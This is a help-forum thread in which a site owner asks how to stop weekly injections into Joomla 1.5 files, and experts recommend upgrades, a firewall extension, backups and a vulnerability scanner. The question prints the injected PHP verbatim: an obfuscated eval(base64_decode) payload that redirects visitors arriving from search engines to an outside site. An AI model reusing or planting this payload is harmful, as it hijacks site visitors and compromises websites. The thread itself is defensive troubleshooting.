Solved

Joomla Exploit

Posted on 2011-09-21
7
998 Views
Last Modified: 2012-05-12
We are being attacked weekly with the same code.

Added to the changelog, configuration, credits, license, index php files is the code (after the <?php>

I remove the code when i see the files have been modified which seems to be weekly... but they return.  

The code added is attached.

I know a resolution would be to upgrade to 1.7 Joomla but am hoping to find a more expedient and less costly for my client.
<?php	                                       	eval(base64_decode("ZXJyb3JfcmVwb3J0aW5nKDApOwokcWF6cGxtPWhlYWRlcnNfc2VudCgpOwppZiAoISRxYXpwbG0pewokcmVmZXJlcj0kX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ107CiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOwppZiAoJHVhZykgewppZiAoc3RyaXN0cigkcmVmZXJlciwieWFuZGV4Iikgb3Igc3RyaXN0cigkcmVmZXJlciwieWFob28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb29nbGUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaW5nIikgb3Igc3RyaXN0cigkcmVmZXJlciwicmFtYmxlciIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImdvZ28iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJsaXZlLmNvbSIpb3Igc3RyaXN0cigkcmVmZXJlciwiYXBvcnQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJuaWdtYSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIndlYmFsdGEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiYWlkdS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJkb3VibGVjbGljay5uZXQiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiZWd1bi5ydSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInN0dW1ibGV1cG9uLmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpdC5seSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInRpbnl1cmwuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiY2xpY2tiYW5rLm5ldCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJsb2dzcG90LmNvbSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm15c3BhY2UuY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZmFjZWJvb2suY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYW9sLmNvbSIpKSB7CmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7CmhlYWRlcigiTG9jYXRpb246IGh0dHA6Ly9wcnNuYnJrLm9zYS5wbC8iKTsKCWV4aXQoKTsKCX0KfQp9Cgl9"));

Open in new window

0
Comment
Question by:bborner
7 Comments
 
LVL 13

Accepted Solution

by:
NUKIT earned 250 total points
Comment Utility
Well for starters you should at least upgrade to Joomla 1.5.23.  Joomla 1.5.6 is much less secure than that.

Please let me know if you need help in finding the upgrade files.

Also, please check into RS Firewall, it does cost a little bit of $$, but it WILL help you in your fight against the hackers.

Main goal though is to get upgraded to 1.5.23 first.
0
 
LVL 13

Expert Comment

by:NUKIT
Comment Utility
Here's a link for RS Firewall:
http://www.rsjoomla.com/joomla-extensions/joomla-security.html

And a link for the 1.5.23 upgrade from your version:
http://joomlacode.org/gf/project/joomla/frs/?action=FrsReleaseBrowse&frs_package_id=5848

*Also make sure you backup your website on a regular basis.  Akeeba Backup will assist with that.
http://extensions.joomla.org/extensions/access-a-security/site-security/backup/1606

Please let me know if you need any additional help.
0
 

Author Comment

by:bborner
Comment Utility
Great advice ... will take it one step at a time starting with akeeba.
Will get back to you with progress.
Thanks
0
6 Surprising Benefits of Threat Intelligence

All sorts of threat intelligence is available on the web. Intelligence you can learn from, and use to anticipate and prepare for future attacks.

 
LVL 13

Expert Comment

by:NUKIT
Comment Utility
Sounds good.
0
 
LVL 15

Expert Comment

by:Russell_Venable
Comment Utility
Can't tell you what there using as the code you posted got edited by the moderators, it seems atleast.
0
 
LVL 15

Assisted Solution

by:Russell_Venable
Russell_Venable earned 250 total points
Comment Utility
You can scan your website using the joomla vulnerability scanner which is made by yehs, which is a ethical hacker group dedicated in finding and patching these vulnerability's. So credentials are valid and trustable.

You can download it from owsap or there own site both links are on this page. https://www.owasp.org/index.php/Category:OWASP_Joomla_Vulnerability_Scanner_Project

Atleat this will give you a idea of what fixes you need to look out for ad what php file is giving the problem.


0
 
LVL 13

Expert Comment

by:StormITSolutions
Comment Utility
Yeah the code seems edited so i cant see where they are attacking

Feel free to email me the code via the contact form on our profile site

Should be fairly easy to block this, we had one similar through com_properties that looks like a similar exploit

also get Admin Tools as it adds lots of features to the site for security protection

Storm
0

Featured Post

IT, Stop Being Called Into Every Meeting

Highfive is so simple that setting up every meeting room takes just minutes and every employee will be able to start or join a call from any room with ease. Never be called into a meeting just to get it started again. This is how video conferencing should work!

Join & Write a Comment

The term "Bad USB" is a buzz word that is usually used when talking about attacks on computer systems that involve USB devices. In this article, I will show what possibilities modern windows systems (win8.x and win10) offer to fight these attacks wi…
Envision that you are chipping away at another e-business site with a team of pundit developers and designers. Everything seems, by all accounts, to be going easily.
This video discusses moving either the default database or any database to a new volume.
You have products, that come in variants and want to set different prices for them? Watch this micro tutorial that describes how to configure prices for Magento super attributes. Assigning simple products to configurable: We assigned simple products…

763 members asked questions and received personalized solutions in the past 7 days.

Join the community of 500,000 technology professionals and ask your questions.

Join & Ask a Question

Need Help in Real-Time?

Connect with top rated Experts

14 Experts available now in Live!

Get 1:1 Help Now